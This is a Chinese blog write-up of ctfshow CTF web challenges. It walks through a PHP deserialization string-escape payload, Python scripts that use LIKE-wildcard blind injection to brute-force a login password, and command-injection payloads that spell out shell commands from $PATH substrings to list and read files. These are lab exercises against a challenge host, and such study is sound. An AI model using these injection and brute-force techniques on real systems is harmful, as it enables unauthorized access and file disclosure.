ctfshow_月饼杯

最新推荐文章于 2023-12-04 14:03:10 发布
最新推荐文章于 2023-12-04 14:03:10 发布
阅读量459 收藏
点赞数
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/116353054
版权

文章目录

0x01 web1_此夜圆 (反序列化逃逸)

下载附件拿到源码,是反序列化逃逸的题

懒得算,直接遍历Firebasky的数量

<?php
error_reporting(0);
class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				echo "success!";	
			}
			else
			{
				echo 'wrong password';
			}
	}
}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}
$o = new a("test",1);
$encode = filter(serialize($o));
echo "正常格式:".$encode."\n";
//遍历payload:Firebasky乘以i加";s:8:"password";s:5:"yu22x";}
for ($i=0; $i < 40; $i++) { 
	$payload = str_repeat("Firebasky",$i).'";s:8:"password";s:5:"yu22x";}';
	$o = new a($payload,1);
	$encode = filter(serialize($o));
	$decode = unserialize($encode);
	if($decode->password=="yu22x"){
		echo "\npayload为:".$payload;
	}
}

结果:

正常格式:O:1:"a":2:{s:5:"uname";s:4:"test";s:8:"password";i:1;}
wrong passwordflag
payload为:FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}[Finished in 0.1s]

在这里插入图片描述

0x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母)

在登录页面的源代码中可以看到一些提示
在这里插入图片描述
用户名为yu22x,查询语句为like,可以使用通配符%_

百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线_通配符允许匹配任何单个字符。

fuzz了一下,被过滤的有这些字符,%号被过滤了,我们可以使用_
在这里插入图片描述

写个脚本测试一下密码长度

import requests

headers = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"
data = {
    "username": "yu22x",
    "password": "{0}"
}
req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format("a")})
print(len(req.text))
for i in range(1, 50):
    req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format("_" * i)})
    if len(req.text) != 52:
        print("[+] 长度为", i)

长度为32
在这里插入图片描述
然后用32个_去登录,yu22x________________________________

I have filtered all the characters. Why can you come in? get out!

看来是必须用真实的密码登录,写个脚本跑一下

import requests

headers = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"
data = {
    "username": "yu22x",
    "password": "{0}"
}
fuzz = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
res = ""
for i in range(32):
    for j in fuzz:
        req = requests.post(url=url, data={"username": "yu22x", "password": "{0}".format(res+j+"_"*(31-i))})
        # print(res+j+"_"*(32-i))
        if "wrong" not in req.text:
            res += j
            print(res)
            break

得到密码67815b0c009ee970fe4014abaa3Fa6A0
在这里插入图片描述
然后后面的都没想到,最开始还以为是ssrf,看了题解才知道怎么做

在这里插入图片描述
在这里插入图片描述

利用环境变量构造ls

0;${PATH:5:1}${PATH:11:1}

在这里插入图片描述
构造nl
在这里插入图片描述

0;${PATH:14:1}${PATH:5:1} ????.???
天问_Herbert555
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
【微信小程序源码-毕业设计期末大作业】09_月饼类展示小程序.zip
05-12
微信小程序源码-毕业设计期末大作业前端项目源码 微信小程序源码-毕业设计期末大作业前端项目源码 微信小程序源码-毕业设计期末大作业前端项目源码 微信小程序源码-毕业设计期末大作业前端项目源码 ...
CTFSHOW 月饼 web
feng的博客
01-29 525
web1_此夜圆 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup()
ctfshow-月饼
LYJ20010728的博客
06-15 621
web1_此夜圆web1_此夜圆考点思路Payloadweb2_故人心考点思路Payloadweb3_莫负婵娟考点思路Payload web1_此夜圆 考点 php反序列化字符逃逸 思路 观察 index.php 代码,很容易发现是php反序列化字符逃逸中字符增多的考点,我们要将password的值变为yu22x,从而达到包含 flag.php 的目的,我们需要逃逸的部分为 ";s:8:"password";s:5:"yu22x";},长度为30,所以我们需要15个 Firebasky来达到逃逸这部分
ctfshow web篇月饼
读书 买花 长大
01-05 304
月饼
ctfshow 月饼
akxnxbshai的博客
12-01 817
ctfshow练习。
ctfshow-web【七夕
记录学习,一起进步
05-10 314
ctfshow-web【七夕
中秋月饼中秋月饼中秋月饼
01-30
中秋月饼
中秋节月饼礼盒模板
08-24
【标题】"中秋节月饼礼盒模板"所涉及的知识点主要集中在设计领域,特别是平面设计和包装设计方面。在设计行业中,模板通常是为了方便快速创建符合特定主题或节日的设计元素,节省时间和精力。中秋节是中国传统的重要...
月饼食品公司网页模板
01-18
月饼食品公司网页模板】是一种专门针对月饼销售和食品行业的网站设计模板,旨在为这类企业提供一个快速、便捷的在线展示平台。网页模板是预先设计好的网页结构和布局,包括色彩搭配、图片选择、字体风格等元素,...
2021中秋月饼消费大赏
10-13
【2021中秋月饼消费大赏】报告揭示了2021年中秋节期间月饼及相关零食消费的趋势。根据CBNData的数据,糕点/点心、饼干/膨化食品、卤味零食是中秋节前后的线上零食消费热门类别,尤其是包含月饼的糕点/点心品类最为...
ctfshow web 月饼
m0_62422842的博客
06-10 492
刷题知识总结:php反序列化字符逃逸。php浮点数绕过。hash爆破。file_get_contents读取任意文件。like盲注,脚本编写。通过环境变量截取字符。
ctfshow月饼 web wp
Firebasky的博客
09-27 1227
这次的这个比赛中的web是我和羽师傅还有m3w师傅一起出的,一人一道。 其中最喜欢的是web3 羽师傅出的,真的太有意思啦。感谢羽师傅呢。 还有web1让自己复习序列化知识,感谢m3w师傅呢 web1_此夜圆 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname;.
ctfshow-月饼WP
~airrudder~
09-27 4413
源码文件Baby(Don't)Cry.py: # -*- coding:utf-8 -*- #Author: Lazzaro from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return
ctfshow月饼 web_wp
西部壮仔的博客
11-11 395
web1_此夜圆 ​ 题目如下 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->passwo
CTFSHOW-七夕
最新发布
y2xsec的博客
12-04 150
看汇编就可以看到字符串,小端序倒序一下转字符串就解得了。
CTFshow - 七夕复现
Pai_Space
10-24 739
CTFshow 七夕
ctfshow_七夕_MISC:你会lsb吗
Altering_Ji的博客
08-10 2773
记录ctfshow网站的七夕的一道有趣的杂项题:你会lsb吗
月饼词云python
09-16
月饼词云的制作涉及到Python中的数据分析和可视化技术。您可以使用Python的数据分析库(如pandas)和可视化库(如matplotlib或WordCloud)来处理和展示月饼的数据。您可以按照以下步骤进行操作: 1. 导入所需的库,如pandas、matplotlib和WordCloud。 2. 读取包含月饼数据的文件,并将其加载到一个pandas的DataFrame中。 3. 对数据进行必要的清洗和处理,例如去除重复项、空值或异常值。 4. 提取月饼的关键词信息,可以使用分词工具(如jieba)进行中文分词。 5. 统计每个关键词的出现频率,并将其转换为词云所需的格式。 6. 使用WordCloud库生成词云图,并设置合适的参数(如词云的大小、颜色、形状等)。 7. 展示生成的词云图。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值